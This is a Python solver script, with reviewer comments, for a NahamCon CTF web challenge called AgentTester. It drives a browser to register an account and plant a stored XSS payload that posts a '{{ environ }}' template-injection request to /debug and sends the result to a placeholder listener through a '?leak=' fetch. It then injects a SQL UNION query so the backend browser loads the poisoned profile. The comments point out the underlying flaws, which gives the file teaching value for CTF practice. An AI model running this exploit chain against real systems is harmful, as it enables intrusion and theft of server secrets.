NahamCon CTF's AgentTester solver.
import random
import secrets
import string

import requests
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.ui import WebDriverWait
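def random_string(length):
    """Return *length* random characters drawn from A-Z and 0-9.

    The script uses this to mint a throwaway username, password and
    User-Agent, so the characters are taken from ``secrets`` (a CSPRNG)
    instead of ``random``, which is not suitable for credential material.

    Args:
        length: number of characters to produce; ``0`` (or a negative
            value, as with the original ``random.choices(k=...)``) yields
            an empty string.

    Returns:
        A ``str`` of exactly ``max(length, 0)`` uppercase letters and digits.
    """
    alphabet = string.ascii_uppercase + string.digits
    # secrets.choice has no k= parameter, so draw one character at a time.
    return ''.join(secrets.choice(alphabet) for _ in range(length))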
# --- Configuration: both values are placeholders that must be set before running ---
chall_url = "http://challenge.nahamcon.com:1337" # Change this
# Listener that will receive the exfiltrated data in its ?leak= query string (see XSS below).
remote_server = "http://your.server" # Change this
# Throwaway account for this challenge instance. The User-Agent is randomised as well
# because it is reused later as the first column of the UNION row and as the
# User-Agent of the keep-alive requests at the bottom (presumably the backend
# matches entries by User-Agent -- confirm against the challenge source).
username, password, uAgent = random_string(10), random_string(10), random_string(10)
email = f"{username}@{username}.com"
# Stored-XSS payload written into the profile "about" field. The leading `">` closes
# the attribute/tag the field is rendered in; the script then POSTs
# code={{ environ }} to /debug -- a template expression the endpoint presumably
# evaluates server-side (SSTI; confirm) -- and forwards the response body to
# remote_server. From a defender's view two separate failures are needed for this to
# work: the "about" text is not output-encoded, and /debug evaluates caller-supplied code.
XSS = """"><script>fetch('/debug', {method: 'POST', headers: new Headers({'Content-Type': 'application/x-www-form-urlencoded'}), body: "code={{ environ }}"}).then(response => response.text()).then(data => fetch("%s/?leak="+encodeURIComponent(data)));</script>""" % remote_server
options = webdriver.ChromeOptions()
# options.add_argument('--headless')
# --no-sandbox disables Chrome's renderer sandbox; acceptable only for a disposable
# browser such as this one, never for a browser that handles real accounts.
options.add_argument('--no-sandbox')
options.add_argument("user-agent=%s" % uAgent)
# driver = webdriver.Remote("HUB_URL", options=options)
# NOTE(review): the driver is never quit(); a try/finally around the steps below
# would release the browser process on any exception or Ctrl-C.
driver = webdriver.Chrome(options=options)
driver.get(chall_url + "/signup")
# Sign up
# NOTE(review): the find_element_by_* helpers were removed in Selenium 4.3+;
# driver.find_element(By.ID, "...") is the supported spelling.
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "usernameInput")))
driver.find_element_by_id("usernameInput").send_keys(username)
driver.find_element_by_id("emailInput").send_keys(email)
driver.find_element_by_id("password1Input").send_keys(password)
driver.find_element_by_id("password2Input").send_keys(password)
driver.find_element_by_xpath("//button[@type='submit']").click()
# Sign in
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "passwordInput")))
driver.find_element_by_id("usernameInput").send_keys(username)
driver.find_element_by_id("passwordInput").send_keys(password)
driver.find_element_by_id("submitButton").click()
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "userAgentInput")))
# Retrieve session cookie ("auth2") so the plain HTTP requests at the end are authenticated.
# Raises KeyError/TypeError if the cookie is absent; that would indicate the login failed.
session_cookie = driver.get_cookie('auth2')["value"]
# Submit XSS in /profile/<id>
driver.find_element_by_xpath("//a[contains(@href,'profile')]").click()
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "aboutInput")))
driver.find_element_by_id("aboutInput").send_keys(XSS)
profile_id = driver.current_url.split("/")[-1] # get profile ID
driver.find_element_by_xpath("//button[@type='submit']").click()
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "aboutInput")))
# SQLi to make the backend browser visit our profile
# The value typed into userAgentInput is concatenated into a query; the UNION row supplies
# (uAgent, <our profile URL>) -- per the comment above, the second column is the URL the
# backend browser opens. A parameterised query would reduce this input to a literal string.
SQLi = """' UNION SELECT '%s', '%s' -- """ % (uAgent, f"{chall_url}/profile/{profile_id}")
driver.find_element_by_xpath("//span[contains(@class,'title')]").click()
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "userAgentInput")))
driver.find_element_by_id("userAgentInput").send_keys(SQLi)
driver.find_element_by_xpath("//button[@type='submit']").click()
# NOTE(review): unbounded loop with no delay between requests -- it hammers the
# challenge host until interrupted; a time.sleep() and/or an iteration cap would
# be kinder. Only the response headers are printed; the leaked data arrives at
# remote_server, not here.
while True:
    print("Making request to keep the profile cached... Check your logs!")
    print(requests.get(f"{chall_url}/profile/{profile_id}", cookies={'auth2': session_cookie}, headers={'User-Agent': uAgent}).headers)